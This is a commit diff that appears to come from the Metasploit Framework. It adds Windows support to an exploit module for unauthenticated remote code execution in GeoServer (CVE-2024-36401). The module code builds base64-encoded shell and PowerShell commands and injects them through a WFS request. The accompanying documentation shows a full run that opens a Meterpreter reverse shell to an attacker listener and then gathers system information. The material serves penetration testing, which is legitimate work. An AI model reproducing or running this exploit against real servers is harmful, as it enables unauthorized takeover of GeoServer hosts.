added windows support

Author: jheysel-r7

documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md

@@ -26,7 +26,11 @@ The following GeoServer releases are tested:
 * geoserver 2.23.5 on x64 Ubuntu 22.04
 * geoserver 2.23.5 on Raspberry PI-4 ARM64 Kali Linux 2024.4
 
+**Windows 10 installer installs with Jetty**
+* geoserver 2.25.0 on x64 Windows 10 (10.0 Build 19045)
+
 ## Installation steps to install the GeoServer web application
+* [Installation steps](https://docs.geoserver.org/latest/en/user/installation/win_installer.html) for Windows installer.
 * [Installation steps](https://docs.geoserver.org/latest/en/user/installation/linux.html) for platform-independent Linux binary.
 * [Installation steps](https://docs.geoserver.org/latest/en/user/installation/docker.html) for osgeo.org/geoserver docker images.
 * Use the docker-compose.yaml config file below to pull the vulhub geoserver docker images.
@@ -312,5 +316,37 @@ meterpreter > pwd
 /usr/share/geoserver
 meterpreter >
 ```
+### GeoServer 2.25.0 on x64 Windows 10 (10.0 Build 19045)
+```
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 172.16.199.131
+rhosts => 172.16.199.131
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 2
+target => 2
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target is vulnerable. Version 2.25.0
+[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (201798 bytes) to 172.16.199.131
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.131:51235) at 2024-07-11 16:14:11 -0700
+
+meterpreter > getuid
+Server username: DESKTOP-N3ORU31\msfuser
+meterpreter > sysinfo
+Computer        : DESKTOP-N3ORU31
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```
 ## Limitations
 No limitations.

modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb

@@ -30,6 +30,7 @@ def initialize(info = {})
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'jheysel-r7', # MSF module Windows support
           'Steve Ikeoka' # Discovery
         ],
         'References' => [
@@ -66,7 +67,18 @@ def initialize(info = {})
                 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
               }
             }
-          ]
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => ['Windows'],
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
@@ -138,10 +150,16 @@ def create_payload(cmd)
     feature_type = get_valid_featuretype
     feature_type = 'sf:archsites' if feature_type.nil?
 
-    # create customised b64 encoded payload
-    # 'Encoder' => 'cmd/base64' does not work in this particular use case
-    cmd_b64 = Base64.strict_encode64(cmd)
-    cmd = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"
+    case target['Type']
+    when :unix_cmd || :linux_dropper
+      # create customised b64 encoded payload
+      # 'Encoder' => 'cmd/base64' does not work in this particular use case
+      cmd_b64 = Base64.strict_encode64(cmd)
+      cmd = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"
+    when :win_cmd
+      enc_cmd = Base64.strict_encode64("cmd /C --% #{payload.encoded}".encode('UTF-16LE'))
+      cmd = "powershell.exe -e #{enc_cmd}"
+    end
 
     return <<~EOS
       <wfs:GetPropertyValue service='WFS' version='2.0.0'
@@ -177,7 +195,7 @@ def exploit
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
 
     case target['Type']
-    when :unix_cmd
+    when :unix_cmd, :win_cmd
       execute_command(payload.encoded)
     when :linux_dropper
       # don't check the response here since the server won't respond